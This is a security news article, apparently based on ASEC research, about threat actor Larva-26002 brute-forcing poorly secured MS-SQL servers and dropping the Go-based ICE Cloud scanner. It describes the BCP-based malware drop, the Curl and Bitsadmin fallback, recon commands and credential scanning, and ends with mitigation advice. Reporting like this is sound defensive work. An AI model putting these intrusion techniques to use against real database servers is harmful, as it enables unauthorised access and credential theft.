A persistent threat actor, identified as Larva-26002, has been continuously targeting poorly managed Microsoft SQL (MS-SQL) servers, now deploying a new scanner malware named ICE Cloud Client. This campaign, active since at least January 2024 and extending into 2026, showcases the attacker’s evolving toolset, shifting from ransomware operations to large-scale scanning of vulnerable database infrastructure.
Initially, in January 2024, the group gained notoriety for deploying Trigona and Mimic ransomware on internet-exposed MS-SQL servers with weak credentials. They notably exploited the Bulk Copy Program (BCP) utility, a legitimate MS-SQL tool, to extract and drop malware onto compromised hosts. Remote access was facilitated through tools like AnyDesk, along with port forwarders for RDP connections. By 2025, the threat actor had incorporated Teramind, a remote monitoring and management (RMM) tool, and transitioned to a scanner written in Rust.
Recent findings from ASEC analysts in 2026 reveal a new offensive by the same threat actor, compromising MS-SQL servers previously targeted in earlier years. This latest wave involves the deployment of ICE Cloud, a scanner malware developed in the Go programming language, marking a departure from the Rust-based scanner used previously. Evidence linking this campaign to earlier Mimic ransomware attacks comes from encoded Turkish binary strings within ICE Cloud. This pattern of repeated targeting underscores a deliberate, long-term strategy focused on unpatched database servers.
What elevates the concern surrounding this campaign is the strategic shift from ransomware to scanning. By accumulating a growing network of compromised servers that silently probe other databases for weak credentials, the threat actor appears to be laying the groundwork for more significant future operations. The data collected is then exfiltrated to the attacker’s command-and-control (C&C) server, providing the group with a comprehensive overview of exposed database assets across the internet.
ICE Cloud Scanner: The Infection Mechanism
The infiltration process begins when Larva-26002 identifies an MS-SQL server accessible online with inadequate password security. Upon gaining access, typically through brute force or dictionary attacks, the attacker executes system commands such as hostname, whoami, and netstat -an to gather information about the targeted host. Malware is then generated using the BCP utility. This process involves exporting a malicious binary from the database table uGnzBdZbsi to a local directory, designated as api.exe, guided by a formatting file named FODsOZKgAU.txt. This specific method of malware deployment has remained consistent since 2024.
In instances where the BCP utility is unsuccessful, the malware is downloaded using Curl or Bitsadmin via PowerShell. This alternative method ensures the delivery of the malicious payload even when the primary method faces obstructions.
The file labeled ICE Cloud Launcher, or api.exe, establishes a connection to a C&C server for authentication before proceeding to download the core scanning component, known as ICE Cloud Client. Once acquired, ICE Cloud Client is saved under a randomly generated filename, an obfuscation technique intended to make it appear as a legitimate program.
Following its installation, the malware registers itself with the C&C server. This server then provides the scanner with a list of MS-SQL addresses to target, along with a credential pair, often exemplified by ecomm/ecomm, and a task string like TASK. The scanner then attempts to log in using these provided credentials and reports any successful access attempts back to the C&C server.
Internal binary strings within the malware are written in Turkish and incorporate emoji characters, suggesting the potential utilization of generative AI tools by the developer in crafting certain code segments. This detail offers a subtle clue into the development process and the potential background of the threat actor.
To mitigate these risks, database administrators are strongly advised to implement robust, complex passwords for all MS-SQL accounts and to update them regularly. Any MS-SQL server exposed to the internet must be shielded by a firewall that strictly permits only authorized incoming connections. Maintaining up-to-date endpoint security software is also crucial, as it helps in detecting and blocking known malware before it can execute on a host system.
Administrators should remain vigilant for any unusual BCP activity, the presence of unexpected files such as api.exe in the C:ProgramData directory, or unauthorized outbound network connections. Any such indicators should be treated as potential compromise incidents requiring immediate and thorough investigation.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.